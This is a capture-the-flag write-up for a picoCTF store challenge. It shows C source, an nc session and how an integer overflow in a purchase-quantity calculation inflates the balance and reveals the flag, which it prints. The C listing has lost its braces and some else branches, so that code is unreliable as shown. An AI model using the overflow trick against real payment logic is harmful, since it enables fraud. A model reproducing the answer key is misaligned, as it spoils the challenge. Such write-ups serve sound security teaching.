A source file in C is given.
nc jupiter.challenges.picoctf.org 9745
#include <stdio.h>
#include <stdlib.h>
int main()
setbuf(stdout, NULL);
int con;
con = 0;
int account_balance = 1100;
while (con == 0)
printf("Welcome to the flag exchange\n");
printf("We sell flags\n");
printf("\n1. Check Account Balance\n");
printf("\n2. Buy Flags\n");
printf("\n3. Exit\n");
int menu;
printf("\n Enter a menu selection\n");
scanf("%d", &menu);
if (menu == 1)
printf("\n\n\n Balance: %d \n\n\n", account_balance);
else if (menu == 2)
printf("Currently for sale\n");
printf("1. Defintely not the flag Flag\n");
printf("2. 1337 Flag\n");
int auction_choice;
scanf("%d", &auction_choice);
if (auction_choice == 1)
printf("These knockoff Flags cost 900 each, enter desired quantity\n");
int number_flags = 0;
scanf("%d", &number_flags);
if (number_flags > 0)
int total_cost = 0;
total_cost = 900 * number_flags;
printf("\nThe final cost is: %d\n", total_cost);
if (total_cost <= account_balance)
account_balance = account_balance - total_cost;
printf("\nYour current balance after transaction: %d\n\n", account_balance);
printf("Not enough funds to complete purchase\n");
else if (auction_choice == 2)
printf("1337 flags cost 100000 dollars, and we only have 1 in stock\n");
printf("Enter 1 to buy one");
int bid = 0;
scanf("%d", &bid);
if (bid == 1)
if (account_balance > 100000)
FILE *f = fopen("flag.txt", "r");
if (f == NULL)
printf("flag not found: please run this on the server\n");
char buf[64];
fgets(buf, 63, f);
printf("YOUR FLAG IS: %s\n", buf);
printf("\nNot enough funds for transaction\n\n\n");
con = 1;
return 0;
Compiling the source file.
gcc store.c
Running a.out provides the following output.Depending on the number input, the program will show different outputs. Connected using the nc connection also connects to the same program.
Welcome to the flag exchange
We sell flags
1. Check Account Balance
2. Buy Flags
3. Exit
Enter a menu selection
Going through the program it can be seen that there is a check for account balance if (account_balance > 100000) it will provide the flag.So we need to make the account balance greater than 100000. Looks like using a overflow bug the account balance can be changed to a large number.
>> nc jupiter.challenges.picoctf.org 9745
Welcome to the flag exchange
We sell flags
1. Check Account Balance
2. Buy Flags
3. Exit
Enter a menu selection
Balance: 1100
Welcome to the flag exchange
We sell flags
1. Check Account Balance
2. Buy Flags
3. Exit
Enter a menu selection
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
These knockoff Flags cost 900 each, enter desired quantity
The final cost is: -1943133060
Your current balance after transaction: 1943134160
Welcome to the flag exchange
We sell flags
1. Check Account Balance
2. Buy Flags
3. Exit
Enter a menu selection
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
1337 flags cost 100000 dollars, and we only have 1 in stock
Enter 1 to buy one1
YOUR FLAG IS: picoCTF{m0n3y_bag5_65d67a74}
Welcome to the flag exchange
We sell flags
1. Check Account Balance
2. Buy Flags
3. Exit
Enter a menu selection